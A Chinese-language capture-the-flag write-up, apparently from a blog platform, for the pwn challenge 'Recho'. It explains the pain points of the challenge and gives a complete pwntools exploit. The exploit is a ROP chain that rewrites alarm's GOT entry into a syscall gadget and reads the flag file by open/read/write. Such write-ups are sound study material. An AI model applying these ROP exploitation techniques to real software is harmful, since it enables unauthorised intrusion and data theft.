攻防世界 - pwn - Recho

极其折磨的一道题,就像其他WP中提到的,需要ORW和pwntools shutdown结束输入流,我这里不再说和别人一样的内容了,讲一讲整个痛苦的解题过程。

翻到别人的WP都是用syscall来做ORW的,第一反应就是,既然能syscall,为啥不直接getshell?毕竟有gadget可以写任意内存,写个"/bin/sh\x00"也不是什么难事,然后就感受到了这题最坑的地方:结束输入流,如果不跳出这个循环的话就没法做ROP,但跳出之后由于已经shutdown send了,交互都没法进行,getshell的希望直接被掐灭。

然后是第二个痛点,endbr 64指令,具体参考可以看这篇博客https://blog.csdn.net/clh14281055/article/details/117446588,简单来说就是intel新加的一条安全性检查的指令,大部分情况下视作nop即可,但这条指令事实上已用到最新版本的libc中,如果你的libc版本足够新且CPU也不是十多年前的古董的话大概率libc库函数第一条指令就是endbr 64,而这和服务器上是不一致的。

为了弄明白什么时候要用ORW我去下了seccomp-tools这个工具,跑出来的结果和我在网上看到的大相径庭,至今没搞清楚原因。

最后是open之后的fd,linux中默认的file descriptor有三个分别是0,1,2,open之后的返回的fd一般为3,对我来说也算是冷知识了,可以简单验证下:

#include <fcntl.h>
#include <stdio.h>

int main() {
  int fd;
  fd = open("sol.py", O_RDONLY);
  printf("%d", fd);
}

以上就是花了半天时间整理的痛点,剩下的留给exp:

from pwn import *


def rechosend(r: remote, lenth: int, data: bytes):
    r.sendline(str(lenth))
    r.sendline(data)


context.log_level = "debug"
# r = process("./Recho")
r = remote("111.200.241.244", 58265)
elf = ELF("./Recho")

pop_rax = 0x4006fc
pop_rdi = 0x4008a3
pop_rsi_r15 = 0x4008a1
pop_rdx = 0x4006fe
add_rdi = 0x40070d
flag_addr = elf.sym["flag"]
syscall = elf.plt["alarm"]

r.recvuntil("Welcome to Recho server!\n")
payload = cyclic(0x38)
payload += p64(pop_rdi) + p64(elf.got["alarm"])
payload += p64(pop_rax) + p64(0x5)
payload += p64(add_rdi)
# change alarm_got to syscall

payload += p64(pop_rax) + p64(2)  # sys_open
payload += p64(pop_rdi) + p64(flag_addr)
payload += p64(pop_rsi_r15) + p64(0) + p64(0)  # O_RDONLY
payload += p64(pop_rdx) + p64(0)
payload += p64(syscall)
# open("flag", 0, 0)

payload += p64(pop_rax) + p64(0)  # sys_read
payload += p64(pop_rdi) + p64(3)  # open's fd
payload += p64(pop_rsi_r15) + p64(elf.bss(0)) + p64(0)  # write on .bss
payload += p64(pop_rdx) + p64(40)
payload += p64(syscall)
# read(3, bss_addr, 40)

payload += p64(pop_rax) + p64(1)  # sys_write
payload += p64(pop_rdi) + p64(1)  # stdout's fd
payload += p64(pop_rsi_r15) + p64(elf.bss(0)) + p64(0)  # write on stdout
payload += p64(pop_rdx) + p64(40)
payload += p64(syscall)
# write(1, bss_addr, 40)

rechosend(r, 0x200, payload.ljust(0x200, b"\x00"))
r.shutdown("send")
r.interactive()

# 0x000000000040070d: add byte ptr [rdi], al; ret;
# 0x00000000004006fc: pop rax; ret;
# 0x00000000004008a3: pop rdi; ret;
# 0x00000000004006fe: pop rdx; ret;
# 0x00000000004008a1: pop rsi; pop r15; ret;
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容